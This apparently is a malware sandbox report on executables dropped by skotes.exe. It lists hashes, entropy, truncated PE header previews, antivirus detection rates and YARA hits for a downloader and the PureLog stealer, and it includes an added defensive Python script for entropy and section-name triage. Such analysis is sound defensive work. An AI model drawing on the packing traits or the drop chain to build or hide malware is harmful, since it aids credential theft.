Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...pm;..........."...0..J..........:i... ........@.. ....................................`..................................h..O...................................Th..8............................................ ............... ..H............text...@I... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B.................i......H........6..p1...........................................................0..8.......s2.....(....}<.....}=.....};....|<.....(...+.|<...(....*.0..P........~.........,B.r...p(.....rc..p(.....(.....r...p.(....(......(....o......(......*.0..8.......s,.....(....}......}......}.....|......(...+.|....(....*.0..H........s......./......+....~.....~.....io.........X.......-.r...p.(......+...*.0............r...p( ...o!....+..*...0............r...p( ...o!....+..*...0..2.........r...pr...p

Process: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 4438776
Entropy (8bit): 7.99505709582503
Encrypted: true
SSDEEP: 98304:Z/5zwjjEgd1H9RKNXpyUEJh56Nd1QVECgnD8EUVLbZJZCH3J53uJ+b:Z/qBdHRSXYBmrohgnDfUxbZJE2K
MD5: 3A425626CBD40345F5B8DDDD6B2B9EFA
SHA1: 7B50E108E293E54C15DCE816552356F424EEA97A
SHA-256: BA9212D2D5CD6DF5EB7933FB37C1B72A648974C1730BF5C32439987558F8E8B1
SHA-512: A7538C6B7E17C35F053721308B8D6DC53A90E79930FF4ED5CFFECAA97F4D0FBC5F9E8B59F1383D8F0699C8D4F1331F226AF71D40325022D10B885606A72FE668
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 88%
Reputation: unknown
Preview: MZ`.....................@...................................`...........!..L.!Require Windows..$PE..L....?.O............................_.............@..................................D..............................................0...O...........{C..?..............................................................l............................text............................... ..`.rdata...;.......<..................@..@.data....M..........................@....rsrc....O...0...P..................@..@........U..`.A.......S3.;.VWt.f9.b.A.t...`.A.P.P...P....Y.nj'.@....u..v..=..A..6P......P....9^..].v8.^..3......h..A.P..........P......P..x.A..E..E....;F.r......P.~...Y..6..j...t.A...t$..D....V...%s......A..F8......^.j..q.....A..3.9.`.A.t...@....9D$.t..t$.Ph.....5X.A.....A.3.....D$..`...|$..u..@.....3.....p.A.............t$..D$..t$...`.A./.@..t$...P.Q..%`.A...3.....T$..L$....f..AABBf..u..L$.3.f9.t.@f.<A.u...t$...T.A..L$.......%..........S.\$.V..C;^.tLW3.j.Z...........Q.....3.9F.Y~.9F

Process: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category: dropped
Size (bytes): 4460032
Entropy (8bit): 7.985385064824602
Encrypted: false
SSDEEP: 98304:uOsbw/GM4JTpF/dHkl1J000ReHSmC3J8qP/vbyN/I5i/H8CCW:1KGKJTpldHkl2mCbP/vbiN7C
MD5: 04869F7ACE61605035664AF9589AF21B
SHA1: 0688D7E4038F6103600011198EDECB98DF152221
SHA-256: 957A5B78C870C0C648884B8EE30F5F437325C94212F4436566CCCBC3B88AA987
SHA-512: C78F3877D5ADB2847471B300D259B8875A8BA50A9FA1A1C3981C2A3316C8B5131E9D72D0E503557C14B4FD30A78B8D34C810AADE2EC6BDA4729DAF7FC2F8CCAE
Malicious: true
Reputation: unknown
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....U`g...............(.>D...d..2..........PD...@...................................E...@... ............................._.a.s.....a.....................`....................................................................................... . .pa......>(.................@....rsrc.........a......N(.............@....idata ......a......P(.............@... ..8...a......R(.............@...yxuskcgf.....0.......T(.............@...pwerqsbo.............C.............@....taggant.0......"....C.............@...........................................................................................................................................................................................................................................................................................................................................................

Process: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category: dropped
Size (bytes): 557056
Entropy (8bit): 7.97625978005819
Encrypted: false
SSDEEP: 12288:m1yGb40nH4HBFqIx/d4SosozfXLnHNHOi+VHDXMEKMnjvzmrk:m1yiWFqIx/KSkbX7H1OiFEKMj7R
MD5: FE1B27214B9109A571700417FDCCDA52
SHA1: 85D8C8FC81B1B90F0B27385D1DC0975E32FB26C1
SHA-256: A277014D5CDFADBFC4D32A5A80F8A453A2CE09C166CDAA40C915BA5821B593F1
SHA-512: 884654EE5B1BD1654718AA9AB1B1BA31B842B8F5AE03BC2E9282D1C371E9BCA794A52E0B86B0DE684DA5B47CEAF5A860D097EF36A155D371651487DD8FB17515
Malicious: true
Reputation: unknown
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....cg...............(.VH...v..2...........pH...@..................................fD...@... ............................._pt.s....`t.....................|y..............................,y...................................................... . .Pt......L(.................@....rsrc........`t......\(.............@....idata .....pt......^(.............@... ..8...t......`(.............@...wssfkfzg.............b(.............@...hxglgwdo.............^C.............@....taggant.0......."...dC.............@...........................................................................................................................................................................................................................................................................................................................................................

Process: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category: dropped
Size (bytes): 1374720
Entropy (8bit): 7.0671827674657335
Encrypted: false
SSDEEP: 24576:fYlZH+uQDPYLZtPikfLyXFD3qRc4f6GO4k88P9VB77Ml8fmMxHr:fYu7DPYLZtakzyVD3ELCh//+8fmW
MD5: 669ED3665495A4A52029FF680EC8EBA9
SHA1: 7785E285365A141E307931CA4C4EF00B7ECC8986
SHA-256: 2D2D405409B128EEA72A496CCFF0ED56F9ED87EE2564AE4815B4B116D4FB74D6
SHA-512: BEDC8F7C1894FC64CDD00EBC58B434B7D931E52C198A0FA55F16F4E3D44A7DC4643EAA78EC55A43CC360571345CD71D91A64037A135663E72EED334FE77A21E6
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 28%
Reputation: unknown
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....h.D..........&....&..........................@..........................p......\U....@... ..............................P..........,l.......................c...................................................T...............................text...............................`..`.data...H...........................@....rdata..............................@..@.eh_fram............p..............@..@.bss....4....@...........................idata.......P......................@....CRT....8....p.......$..............@....tls.................&..............@....rsrc...,l.......n...(..............@..@.reloc...c.......d..................@..B................................................................................................................................................................................................................................
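Two of the fields in these dropped-file entries carry most of the triage signal: the "Entropy (8bit)" value (with the derived "Encrypted" flag, which the report sets for the 7.995 sample but not for 7.985 or 7.976), and the section names visible in the header preview, where several of the skotes.exe drops show random eight-letter names such as fhxxuwls / vzpihbtm alongside a .taggant section, while the 1374720-byte drop shows an ordinary MinGW layout (.text, .data, .rdata, .eh_fram, .bss, .idata, .CRT, .tls). The Python below is an added example for reproducing those two checks offline on any PE; it is not Joe Sandbox code and the report does not describe its method. The 7.99 cut-off and the list of "expected" section names are this example's assumptions, and build_test_pe constructs a header-only PE image for demonstration rather than using any file from the report.

```python
"""Added example: 8-bit entropy and PE section-name triage for dropped files.

Not part of the Joe Sandbox report. The ENCRYPTED threshold and KNOWN_SECTIONS
list are assumptions made for this example, not Joe Sandbox's rules.
"""
import math
import struct
from collections import Counter

# Assumption: flag as "encrypted"/packed at 7.99 bits per byte. The report shows
# 7.995 flagged true and 7.985 false, so the real cut-off lies between them.
ENTROPY_ENCRYPTED_THRESHOLD = 7.99

# Section names a stock MSVC / MinGW / .NET build emits. Anything else, such as
# random 8-char names or ".taggant", is a packer hint worth a closer look.
KNOWN_SECTIONS = {".text", ".rdata", ".data", ".rsrc", ".reloc", ".idata",
                  ".edata", ".pdata", ".tls", ".bss", ".CRT", ".eh_fram",
                  ".eh_frame"}


def shannon_entropy(data: bytes) -> float:
    """Entropy in bits per byte (0.0..8.0), the scale of 'Entropy (8bit)'."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def pe_section_names(data: bytes) -> list:
    """Walk DOS header -> e_lfanew -> 'PE\\0\\0' -> COFF header -> section table."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4                      # IMAGE_FILE_HEADER, 20 bytes
    num_sections = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    table = coff + 20 + opt_size             # first IMAGE_SECTION_HEADER (40 bytes each)
    names = []
    for i in range(num_sections):
        raw = data[table + 40 * i: table + 40 * i + 8]
        names.append(raw.split(b"\0", 1)[0].decode("latin-1"))
    return names


def suspicious_sections(names: list) -> list:
    """Section names outside the expected toolchain set."""
    return [n for n in names if n not in KNOWN_SECTIONS]


def triage(data: bytes) -> dict:
    """Summarise one file the way the report's entropy/section fields do."""
    ent = shannon_entropy(data)
    names = pe_section_names(data)
    return {
        "entropy": round(ent, 3),
        "encrypted": ent >= ENTROPY_ENCRYPTED_THRESHOLD,
        "sections": names,
        "suspicious_sections": suspicious_sections(names),
    }


def build_test_pe(section_names: list, payload: bytes) -> bytes:
    """Constructed, header-only PE32 image (not executable) for offline testing."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)  # e_lfanew: PE signature right after DOS header
    opt_size = 224                            # IMAGE_OPTIONAL_HEADER32 size
    # Machine=i386, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics (EXE | 32-bit)
    coff = struct.pack("<HHIIIHH", 0x14C, len(section_names), 0, 0, 0, opt_size, 0x0102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)     # PE32 magic
    sections = b"".join(n.encode("latin-1").ljust(8, b"\0") + bytes(32)
                        for n in section_names)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + sections + payload


if __name__ == "__main__":
    packed = build_test_pe([".text", ".rsrc", ".idata", "fhxxuwls", "vzpihbtm", ".taggant"],
                           bytes(range(256)) * 4096)   # near-uniform body
    plain = build_test_pe([".text", ".data", ".rdata", ".bss", ".idata", ".CRT", ".tls"],
                          b"A" * 4096)                  # low-entropy body
    print(triage(packed))
    print(triage(plain))
```

On a real sample read the file with `open(path, "rb").read()` and pass it to `triage`; the entropy line should match the report's "Entropy (8bit)" for the same bytes, and `suspicious_sections` will surface the same odd names the previews above show. A high entropy alone is not proof of packing (compressed resources do the same), which is why the two checks are reported side by side rather than folded into one verdict.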

Process: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 1861120
Entropy (8bit): 7.948090750964882
Encrypted: false
SSDEEP: 24576:1D3Z+og2dL7dT1TKvDXBujJ535WxkeQaJ4LAQJtbbY9mjrdprIt6vxM2c3WDLKoR:ZJTH/9hWxkeP2Mm7ra6pM2c3+XLl
MD5: 0A678F4E43E83079C1E95517F576A88D
SHA1: 4012A39B2F700273402D3ADBC54F0F87EAC2FA56
SHA-256: 6B17962E6298E3118F5301AF6BDCECCBF3C79663E4A526E128A5C306A232BC01
SHA-512: C3EE30975F86B80DB6F8B0ED9A032924A12486528E0745D02E1E4372DE1775ECDA86CDD17C28586DCDDE1300A95C66579B707944DCDF445B21CCBA2F4FC6DF63
Malicious: true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....<_g..............................I...........@...........................I...........@.................................T0..h.... .......................1...................................................................................... . .........H..................@....rsrc........ .......X..............@....idata .....0.......Z..............@... .@*..@.......\..............@...speiiqif....../......^..............@...suzusvsz.....pI......@..............@....taggant.0....I.."...D..............@...................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2866176
                                                                                                                                                                                                                                        Entropy (8bit):6.525502925454382
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:49152:HQVhw+9Pg4SnSuG7X6Mv+p7hE9YYBc9U6uq:HmhwUPg4SnSuG7X6xtEuYBc9Urq
                                                                                                                                                                                                                                        MD5:05BB24F8C4105C056E6B5250B2A5E488
                                                                                                                                                                                                                                        SHA1:08C3EE6A24FCF83ADC21D807371F5F01CA339892
                                                                                                                                                                                                                                        SHA-256:82CDD20CCD714049CE3DC46DD095B0CF2642789E69B74BC1397AD3AABE3EE3D8
                                                                                                                                                                                                                                        SHA-512:93622B8FF9166BCB33BD624900B7734DF4F1D9C60905917F17EDD762044FE89E2C167BAFE92C6C362CC4116CBEA6B8023EFFB28779D7F238F23581736596DD31
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... ...d..d..d....s.|....F.i....r.^..m.[.g..m.K.b....g..d.......w.w....E.e..Richd..........PE..L....dTg.....................(........N...........@.......................... O.......,...@.................................M.$.a.....$.......................$..................................................................................... . ..$......h..................@....rsrc.........$......x..............@....idata ......$......z..............@...ygtpparq. *...$...*..|..............@...zzjdxvxy......N.......+.............@....taggant.0....N.."....+.............@...........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):972800
                                                                                                                                                                                                                                        Entropy (8bit):6.708509026528111
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24576:DqDEvCTbMWu7rQYlBQcBiT6rprG8ajxvj:DTvC/MTQYxsWR7ajxv
                                                                                                                                                                                                                                        MD5:B491AAFA5C2DE82CA9EE4FEB7B1CD477
                                                                                                                                                                                                                                        SHA1:DE15B7014F0732C945ED22D273EC451658C39A48
                                                                                                                                                                                                                                        SHA-256:D7B75AAA69694C274F81AEEB056095F8C06308FF6BECCE6EBE51AC1B20A92B94
                                                                                                                                                                                                                                        SHA-512:09596C7418031EA5C380C9508856B074D2CEFD38218DCEE3ADAD23FFB3880EB73F9F225B8EDF9BDF2100865FC1E28525F9B608131532C11951569CAAB0E7EDDA
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...................j:......j:..C...j:......@.*...........................n......~............{.......{......{.......z....{......Rich...................PE..L.....dg.........."..........(......w.............@..........................0.......'....@...@.......@.....................d...|....@...l.......................u...........................4..........@............................................text............................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc....l...@...n..................@..@.reloc...u.......v...b..............@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1730560
                                                                                                                                                                                                                                        Entropy (8bit):7.932352607527081
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:49152:jxdPvB0tMvfTRGnbR2RW7mzTXNT+a99J9shct:jHPv9lGT6bNKirs
                                                                                                                                                                                                                                        MD5:19A558B4786AD821CFC44513D9E0AA28
                                                                                                                                                                                                                                        SHA1:62E74215F0B73D4E95283EE88CE028DA8E0F4629
                                                                                                                                                                                                                                        SHA-256:6B32A3D15D1D03D6EEC2261B77503F5323CFCD10E3C79B4BDFE6CAF36F6CDA12
                                                                                                                                                                                                                                        SHA-512:A1711F804DB37019D68FCEF616CC9111D9D3FDDD856860AFF6D431D5F010A1650B2D2E4FA4CF873A2BFCA1FA4504361718D017E4038698EFBECB2B5FB5955D5B
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P(,e.........."...0..$............D.. ...`....@.. ........................D.....Sd....`.................................U...i....`..D........................................................................................................... . .@... ....... ..............@....rsrc...D....`.......2..............@....idata . ...........6..............@... ..)..........8..............@...efaooxfi. ...`*......:..............@...covnxbgl. ....D......B..............@....taggant.@....D.."...F..............@...........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):22016
                                                                                                                                                                                                                                        Entropy (8bit):5.338206717136569
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:78HIRrJs1HLBDhq5RWBNBlBThtq2uoyLizwxeNLHdWuNMV275RtAcL8SFS69rvwM:Qqls1HLBDhIRWbXlq2uVk75RuSFSm6EJ
                                                                                                                                                                                                                                        MD5:04F57C6FB2B2CD8DCC4B38E4A93D4366
                                                                                                                                                                                                                                        SHA1:61770495AA18D480F70B654D1F57998E5BD8C885
                                                                                                                                                                                                                                        SHA-256:51E4D0CBC184B8ABFA6D84E219317CF81BD542286A7CC602C87EB703A39627C2
                                                                                                                                                                                                                                        SHA-512:53F95E98A5ECA472ED6B1DFD6FECD1E28EA66967A1B3AA109FE911DBB935F1ABF327438D4B2FE72CF7A0201281E9F56F4548F965B96E3916B9142257627E6CCD
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 18%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...f.7..........."...0..L...........j... ........@.. ....................................`.................................<j..O....................................i..8............................................ ............... ..H............text....J... ...L.................. ..`.rsrc................N..............@..@.reloc...............T..............@..B................pj......H.......(7...2...........................................................0..8.......s/.....(....} .....}!.....}.....| .....(...+.| ...(....*.0..P........~.........,B.r...p(.....r...p(.....(.....r...p.(....(......(....o......(......*.0..8.......s2.....(....}(.....}).....}'....|(.....(...+.|(...(....*.0..H........s......./......+....~.....~.....io.........X.......-.r...p.(......+...*.0............r...p( ...o!....+..*...0............r...p( ...o!....+..*...0..2.........r...pr...p
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):3286016
                                                                                                                                                                                                                                        Entropy (8bit):7.310046848182974
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:49152:yla31k0wuMKWrJSYQTdfjfkn46z2jnVGd7jyy7qaJJR0BmXSyYO3:yla3/tS4K2jnVGRjHLJfV
                                                                                                                                                                                                                                        MD5:C00A67D527EF38DC6F49D0AD7F13B393
                                                                                                                                                                                                                                        SHA1:7B8F2DE130AB5E4E59C3C2F4A071BDA831AC219D
                                                                                                                                                                                                                                        SHA-256:12226CCAE8C807641241BA5178D853AAD38984EEFB0C0C4D65ABC4DA3F9787C3
                                                                                                                                                                                                                                        SHA-512:9286D267B167CBA01E55E68C8C5582F903BED0DD8BC4135EB528EF6814E60E7D4DDA2B3611E13EFB56AA993635FBAB218B0885DAF5DAEA6043061D8384AF40CA
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\1017914001\db75e03f4b.exe, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\1017914001\db75e03f4b.exe, Author: Joe Security
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 54%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....V...............P.../..Z......../.. ....0...@.. ........................2...........@.................................../.K.....0.@W...................`2.....3./.............................................. ............... ..H............text...../.. ..../................. ..`.rsrc...@W....0..X..../.............@..@.reloc.......`2......"2.............@..B................../.....H...........@.......C...@...z.*.........................................6+.(B.99(....*..:+.(.^A.(!...*.....*....(*...*.....*.......*.......*....(*...*..0..........(*...8y.......E....c...O.../...8^...s......... .....:....&8....s.........8....s......... .....9....& ....8....s......... ....8....*s.........8.......0.............*.0.............*.0.............*.0.............*.0.............*....*.......*....0.............*.0.............*....*....0.............*....*...".......

Process: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 1911296
Entropy (8bit): 7.941764620524562
Encrypted: false
SSDEEP: 49152:CpowwwwaaEprit+X7KAzt4UH2Em9bUPy+qVreck:C+wwwwrEpriQH2HbUK+0k
MD5: FA9DABF05AA60D08C5AA57DA09837347
SHA1: 88A9ADDAA50CB80831ABA6B36D704353D4753E12
SHA-256: 4B3630F249424EF95829D548318C1ACCED7B7A8568B476F9532EB11AAFA721AC
SHA-512: CFE298155074E25A8668D920958691B5AB21C26BD5AB67C95C0C0E53DAD95476B95EA849567DBE8DED9AE0B780F74495FA0F8167FC48C29048F40D9EAFAC7F03
Malicious: true
Reputation: unknown

Process: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 957952
Entropy (8bit): 7.9986004015143015
Encrypted: true
SSDEEP: 24576:h2LddHrlBe4LpCuw8VYHcx5WK1zF7JkLYiY:mdZKspwDa5WK/JkLc
MD5: 5B99682CB740202D783DDE58CA97F045
SHA1: CECAE054552CE295FEAA0717D2A33E870ADDCADD
SHA-256: 724E283E1BB29A150C9BEBC21BDF0E250E2D87257BF86C889BBE7544329C6882
SHA-512: C37A2CB06407729344ADB85D814223A24EC4FA65F711C7F02C0E77395EC969B7E1BD64A6F5806D4E2D88C8461587D68B6AAE3378D2CF5C92F1ADE2AACC13F2B2
Malicious: true
Reputation: unknown

Process: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 1880576
Entropy (8bit): 7.947827107801024
Encrypted: false
SSDEEP: 49152:ZRGDbjz7g+LRMpnd6dc8dwpW+8cYsjL1i:ZRGDrky0nd6dcmUT8AjL1i
MD5: FF279F4E5B1C6FBDA804D2437C2DBDC8
SHA1: 2FEB3762C877A5AE3CA60EEEBC37003AD0844245
SHA-256: E115298AB160DA9C7A998E4AE0B72333F64B207DA165134CA45EB997A000D378
SHA-512: C7A8BBCB122B2C7B57C8B678C5EED075EE5E7C355AFBF86238282D2D3458019DA1A8523520E1A1C631CD01B555F7DF340545FD1E44AD678DC97C40B23428F967
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 81%
Reputation: unknown

Process: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type: PE32 executable (console) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 776832
Entropy (8bit): 7.859727158445845
Encrypted: false
SSDEEP: 12288:smOcxtujRwuweJH9RKC6cmulcfJbBiv0W6NLtXcgAuuweJH9RKC6cmulcfJbBivj:pG+XeJH9Rp6RtfNLtMmXeJH9Rp6RtfN8
MD5: AFD936E441BF5CBDB858E96833CC6ED3
SHA1: 3491EDD8C7CAF9AE169E21FB58BCCD29D95AEFEF
SHA-256: C6491D7A6D70C7C51BACA7436464667B4894E4989FA7C5E05068DDE4699E1CBF
SHA-512: 928C15A1EDA602B2A66A53734F3F563AB9626882104E30EE2BF5106CFD6E08EC54F96E3063F1AB89BF13BE2C8822A8419F5D8EE0A3583A4C479785226051A325
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 68%
Reputation: unknown

Process: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 1885696
Entropy (8bit): 7.9502129539309525
Encrypted: false
SSDEEP: 49152:xygWjRQ3HLL/piTRSyEvGqpGl3Ao1cVPeb3ymHw2NG:ggrHpi8yhqclT1vtN
MD5: 25FB9C54265BBACC7A055174479F0B70
SHA1: 4AF069A2EC874703A7E29023D23A1ADA491B584E
SHA-256: 552F8BE2C6B2208A89C728F68488930C661B3A06C35A20D133EF7D3C63A86B9C
SHA-512: 7DFD9E0F3FA2D68A6CE8C952E3B755559DB73BB7A06C95AD6ED8AC16DEDB49BE8B8337AFC07C9C682F0C4BE9DB291A551286353E2E2B624223487DC1C8B54668
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 75%
Reputation: unknown

Process: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 2039808
Entropy (8bit): 7.95190511268852
Encrypted: false
SSDEEP: 49152:i8yCHGX33Su8Usgk5msPWY14O5Sb7D0Otq+qMnf/w4/T:iPXyuog/Av5/QFqMnf/ww
MD5: 6D4A011DDE3AE4DD05553B27D6FBFC75
SHA1: EB13D57E83CA18083A52BD4927E6039A0AD87F1E
SHA-256: DEC151D71C758D3ED3D86403DC1DEB28ECF80793144E32BC9EB0FC76D5209E86
SHA-512: FDA917FEF5BA08FEB485AB713DD03CA8AD40A5F451698F29DC356ED067967EC866F9D93725F79E79E13D282C01AD2754E15C02E162497B6626CC8829196CB5C6
Malicious: true
Reputation: unknown

Process: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type: PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 21504
Entropy (8bit): 5.336742061370928
Encrypted: false
SSDEEP: 384:JiynHMEyyp/He7ik+KcJB669mNPBqVgYERHtNNVYISZS1d7RroV5:PHvtm7ik+KcJB6jRHkISZShkn
MD5: 14BECDF1E2402E9AA6C2BE0E6167041E
SHA1: 72CBBAE6878F5E06060A0038B25EDE93B445F0DF
SHA-256: 7A769963165063758F15F6E0CECE25C9D13072F67FA0D3C25A03A5104FE0783A
SHA-512: 16B837615505F352E134AFD9D8655C9CABFA5BFCFBEE2C0C34F2D7D9588AA71F875E4E5FEB8CDF0F7BACC00F7C1CA8DABD3B3D92AFC99ABF705C05C78E298B4A
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 54%
Reputation: unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...pm;..........."...0..J..........:i... ........@.. ....................................`..................................h..O...................................Th..8............................................ ............... ..H............text...@I... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B.................i......H........6..p1...........................................................0..8.......s2.....(....}<.....}=.....};....|<.....(...+.|<...(....*.0..P........~.........,B.r...p(.....rc..p(.....(.....r...p.(....(......(....o......(......*.0..8.......s,.....(....}......}......}.....|......(...+.|....(....*.0..H........s......./......+....~.....~.....io.........X.......-.r...p.(......+...*.0............r...p( ...o!....+..*...0............r...p( ...o!....+..*...0..2.........r...pr...p
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Category:dropped
Size (bytes):709231
Entropy (8bit):7.928265744460553
Encrypted:false
SSDEEP:12288:+LL4iKvkzkKla4OFrrOD3UfffDAgFPJ4G+rx1z5DO3eey7DXQ8zqIF4YLMAiu7:aku9a4OJOIfpRmr/1DO3vyI8j4YwM7
MD5:D0A5DC8EE956E9180DE9E4B78BC5F45B
SHA1:CACCAAE3EBA1A297F6213254AA4B1DA3F9B97AA5
SHA-256:2EB65E03EB327CFE084D50398B4C85CB15519E50D2228073F6F0A9D5C1C5CA1E
SHA-512:57909E38090D2A960D191BA8C42DE41A3D9899E01AE152F2F1276723857408C67F826FA8610E76788CB592C3E725EF88BAB76C4F7A2F501B77963258933985A0
Malicious:false
Reputation:unknown
